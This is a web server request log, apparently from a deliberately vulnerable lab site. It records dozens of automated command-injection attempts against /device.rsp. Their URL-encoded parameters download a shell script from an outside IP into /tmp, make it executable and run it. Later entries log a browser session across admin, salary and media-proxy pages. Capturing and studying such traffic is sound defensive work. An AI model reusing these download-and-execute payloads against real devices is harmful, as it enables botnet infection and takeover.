Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 168
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:43032
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:21:56] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:40954
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-03-20 17:21:45] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:34214
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:21:36] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:55552
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+%2A%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:21:25] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:58816
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:21:16] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 171
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:55958
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:21:07] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:34734
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fdev%2Fshm+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fdev%2Fshm+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-03-20 17:21:00] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:41484
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fdev%2Fshm+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Fdev%2Fshm+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:20:52] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:41406
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-03-20 17:20:42] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:53344
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:20:36] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:40724
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-03-20 17:20:25] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:34806
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:20:17] === HTTP Request ===
===================
Cookie: uid=admin
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:48148
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:20:09] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:48078
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:20:05] === HTTP Request ===
===================
Te: trailers
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: script
Pragma: no-cache
Cache-Control: no-cache
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56134
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-20 16:56:04] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Pragma: no-cache
Accept: */*
Via: 2.0 Caddy
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Cache-Control: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-20 16:56:04] === HTTP Request ===
===================
Accept: text/css,*/*;q=0.1
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Priority: u=2
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Sec-Fetch-Dest: style
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Pragma: no-cache
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-20 16:56:04] === HTTP Request ===
[2026-03-20 16:56:04] Login page accessed - IP: 172.30.0.12:57686
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Pragma: no-cache
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: navigate
Priority: u=0, i
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /login
URL: /login
Method: GET
[2026-03-20 16:56:04] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Pragma: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers
X-Forwarded-For: 79.139.135.199
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Cache-Control: no-cache
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-20 16:56:03] === HTTP Request ===
===================
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
X-Forwarded-For: 79.139.135.199
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-20 16:56:03] === HTTP Request ===
===================
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Dest: script
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-20 16:56:03] === HTTP Request ===
===================
Te: trailers
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: style
Cache-Control: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Priority: u=2
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Pragma: no-cache
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-20 16:56:03] === HTTP Request ===
[2026-03-20 16:56:03] Defects page accessed - IP: 172.30.0.12:57686
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: document
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /defects
URL: /defects
Method: GET
[2026-03-20 16:56:03] === HTTP Request ===
[2026-03-20 16:54:18] Salary page accessed - IP: 172.30.0.12:57686
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774025183956749678; user_id=1
X-Forwarded-For: 79.139.135.199
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /salary
URL: /salary
Method: GET
[2026-03-20 16:54:18] === HTTP Request ===
[2026-03-20 16:54:12] Update Financial Info - user_id: 20, wage: 10.47, total: 6637.17
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Cookie: auth=sess_1774025183956749678; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Query: user_id=20&wage=10.47&total=6637.17
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=20&wage=10.47&total=6637.17
Method: GET
[2026-03-20 16:54:12] === HTTP Request ===
[2026-03-20 16:54:12] Update Financial Info - user_id: 20, wage: 10.47, total: 6637.17
===================
Cookie: auth=sess_1774025183956749678; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Priority: u=0
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Query: user_id=20&wage=10.47&total=6637.17
Path: /cabinet/update-financial-info
URL: /cabinet/update-financial-info?user_id=20&wage=10.47&total=6637.17
Method: GET
[2026-03-20 16:54:12] === HTTP Request ===
[2026-03-20 16:54:04] Cabinet page accessed - user_id: 20, IP: 172.30.0.12:57686
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Te: trailers
Priority: u=0
Cookie: auth=sess_1774025183956749678; user_id=1
Accept: */*
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Query: user=20
Path: /cabinet
URL: /cabinet?user=20
Method: GET
[2026-03-20 16:54:04] === HTTP Request ===
[2026-03-20 16:54:03] Defects page accessed - IP: 172.30.0.12:57686
===================
Priority: u=0
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Cookie: auth=sess_1774025183956749678; user_id=1
Accept-Encoding: gzip, deflate, br
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /defects
URL: /defects
Method: GET
[2026-03-20 16:54:03] === HTTP Request ===
[2026-03-20 16:54:01] Media proxy request - url: https://media.vulnberries.ru/media?filename=8, IP: 172.30.0.12:57686
===================
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Priority: u=4
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
If-Modified-Since: Wed, 18 Feb 2026 17:06:25 GMT
Cookie: auth=sess_1774025183956749678; user_id=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Accept: */*
Te: trailers
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D8
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D8
Method: GET
[2026-03-20 16:54:01] === HTTP Request ===
[2026-03-20 16:54:01] Defect detail page accessed - defect_id: 785906f2-e801-4f17-9faf-81aec59d21e3, IP: 172.30.0.12:57686
===================
Via: 2.0 Caddy
Te: trailers
Priority: u=0
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1774025183956749678; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /defects/785906f2-e801-4f17-9faf-81aec59d21e3
URL: /defects/785906f2-e801-4f17-9faf-81aec59d21e3
Method: GET
[2026-03-20 16:54:01] === HTTP Request ===
[2026-03-20 16:53:53] Defects page accessed - IP: 172.30.0.12:57686
===================
X-Forwarded-For: 79.139.135.199
Accept-Encoding: gzip, deflate, br
Via: 2.0 Caddy
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Priority: u=0
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Dest: empty
Cookie: auth=sess_1774025183956749678; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /defects
URL: /defects
Method: GET
[2026-03-20 16:53:53] === HTTP Request ===
[2026-03-20 16:53:50] Main page accessed - IP: 172.30.0.12:57686
===================
Sec-Fetch-Mode: cors
Priority: u=0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
Te: trailers
Cookie: auth=sess_1774025183956749678; user_id=1
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57686
Path: /
URL: /
Method: GET
[2026-03-20 16:53:50] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Priority: u=4
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54884
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-20 16:37:37] === HTTP Request ===
[2026-03-20 16:36:13] Main page accessed - IP: 172.30.0.12:54884
===================
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
